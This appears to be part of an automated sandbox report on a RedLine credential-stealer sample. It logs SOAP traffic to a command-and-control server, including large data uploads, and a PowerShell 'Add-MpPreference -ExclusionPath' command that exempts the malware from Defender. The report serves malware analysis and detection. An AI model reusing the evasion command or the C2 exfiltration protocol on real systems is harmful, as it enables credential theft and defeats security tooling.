                      Jul 16, 2024 19:57:26.922075033 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922079086 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922208071 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922213078 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922221899 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922225952 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922230005 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922235012 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922238111 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922241926 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922281027 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922286034 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922339916 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922344923 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922396898 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922401905 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922411919 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922415972 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922435045 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922439098 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922447920 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922552109 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922616005 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922621012 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922631025 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922668934 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922673941 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922836065 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.922840118 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923155069 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923160076 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923171043 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923175097 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923177958 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923182011 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923186064 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923218012 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923223019 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923232079 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923472881 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923476934 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923480988 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923485041 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923489094 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923492908 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923502922 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923506975 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923510075 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923515081 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923525095 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923540115 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923547029 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923557997 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923562050 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923571110 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923625946 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923629999 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923634052 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923680067 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923892021 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923897028 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923911095 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923913002 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923919916 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923922062 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.923923969 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924098969 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924103975 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924108028 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924112082 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924115896 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924120903 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924252033 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924262047 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924266100 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924274921 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924284935 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:26.924290895 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:27.740200043 CEST5561549723185.222.57.67192.168.2.5
                      Jul 16, 2024 19:57:27.754547119 CEST4972355615192.168.2.5185.222.57.67
                      Jul 16, 2024 19:57:27.754971981 CEST4972255615192.168.2.5185.222.57.67
                      TimestampSource PortDest PortSource IPDest IP
                      Jul 16, 2024 19:57:13.586420059 CEST6471353192.168.2.51.1.1.1
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jul 16, 2024 19:57:13.586420059 CEST192.168.2.51.1.1.10x7167Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 16, 2024 19:57:14.087110043 CEST1.1.1.1192.168.2.50x7167No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                      • 185.222.57.67:55615
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549709185.222.57.67556157912C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      TimestampBytes transferredDirectionData
                      Jul 16, 2024 19:57:07.377110004 CEST240OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.57.67:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Jul 16, 2024 19:57:07.970293999 CEST25INHTTP/1.1 100 Continue
                      Jul 16, 2024 19:57:08.102786064 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Tue, 16 Jul 2024 17:57:07 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Jul 16, 2024 19:57:13.179508924 CEST223OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.57.67:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 16, 2024 19:57:13.352993965 CEST25INHTTP/1.1 100 Continue
                      Jul 16, 2024 19:57:13.545198917 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 5711
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Tue, 16 Jul 2024 17:57:13 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>13.89.107.79</b:string><b:string>52.154.162.77</b:string><b:string>117.61.108.143</b:string><b:string>36.99.136.136</b:string><b:string>20.163.64.196</b:string><b:string>20.163.64.196</b:string><b:string>40.122.25.223</b:string><b:string>27.38.206.93</b:string><b:string>139.186.206.86</b:string><b:string>121.205.80.198</b:string><b:string>36.99.136.137</b:string><b:string>113.103.89.52</b:string><b:string>92.211.227.167</b:string><b:string>92.211.227.167</b:string><b:string>20.99.160.173</b:string><b:string>34.135.23.168</b:string><b:string>34.17.49.70</b:string><b:string>222.98.34.226</b:str [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.549714185.222.57.67556156976C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      TimestampBytes transferredDirectionData
                      Jul 16, 2024 19:57:16.014492989 CEST240OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 185.222.57.67:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Jul 16, 2024 19:57:16.616719961 CEST25INHTTP/1.1 100 Continue
                      Jul 16, 2024 19:57:16.749912977 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Tue, 16 Jul 2024 17:57:16 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Jul 16, 2024 19:57:22.146053076 CEST223OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 185.222.57.67:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 16, 2024 19:57:22.319962978 CEST25INHTTP/1.1 100 Continue
                      Jul 16, 2024 19:57:22.510926008 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 5711
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Tue, 16 Jul 2024 17:57:22 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>13.89.107.79</b:string><b:string>52.154.162.77</b:string><b:string>117.61.108.143</b:string><b:string>36.99.136.136</b:string><b:string>20.163.64.196</b:string><b:string>20.163.64.196</b:string><b:string>40.122.25.223</b:string><b:string>27.38.206.93</b:string><b:string>139.186.206.86</b:string><b:string>121.205.80.198</b:string><b:string>36.99.136.137</b:string><b:string>113.103.89.52</b:string><b:string>92.211.227.167</b:string><b:string>92.211.227.167</b:string><b:string>20.99.160.173</b:string><b:string>34.135.23.168</b:string><b:string>34.17.49.70</b:string><b:string>222.98.34.226</b:str [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.549720185.222.57.67556157912C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      TimestampBytes transferredDirectionData
                      Jul 16, 2024 19:57:17.370488882 CEST221OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.57.67:55615
                      Content-Length: 557210
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 16, 2024 19:57:18.638835907 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Tue, 16 Jul 2024 17:57:18 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                      Jul 16, 2024 19:57:18.640649080 CEST217OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.57.67:55615
                      Content-Length: 557202
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 16, 2024 19:57:19.192188978 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Tue, 16 Jul 2024 17:57:18 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.549722185.222.57.67556156976C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      TimestampBytes transferredDirectionData
                      Jul 16, 2024 19:57:25.200186968 CEST221OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 185.222.57.67:55615
                      Content-Length: 556792
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jul 16, 2024 19:57:26.450489998 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Tue, 16 Jul 2024 17:57:26 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.549723185.222.57.67556156976C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      TimestampBytes transferredDirectionData
                      Jul 16, 2024 19:57:26.460031986 CEST241OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 185.222.57.67:55615
                      Content-Length: 556784
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Jul 16, 2024 19:57:27.740200043 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Tue, 16 Jul 2024 17:57:27 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:13:56:55
                      Start date:16/07/2024
                      Path:C:\Users\user\Desktop\owKQ0b029a.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\owKQ0b029a.exe"
                      Imagebase:0xc70000
                      File size:752'105 bytes
                      MD5 hash:5404B47556A2E1E9EB2F5DA481002616
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:13:56:57
                      Start date:16/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Imagebase:0xd10000
                      File size:550'920 bytes
                      MD5 hash:8A9837F38BD2C2ADDA21106E3B75FFA8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 83%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:8
                      Start time:13:57:04
                      Start date:16/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Imagebase:0x960000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:13:57:04
                      Start date:16/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:10
                      Start time:13:57:04
                      Start date:16/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
                      Imagebase:0x960000
                      File size:433'152 bytes
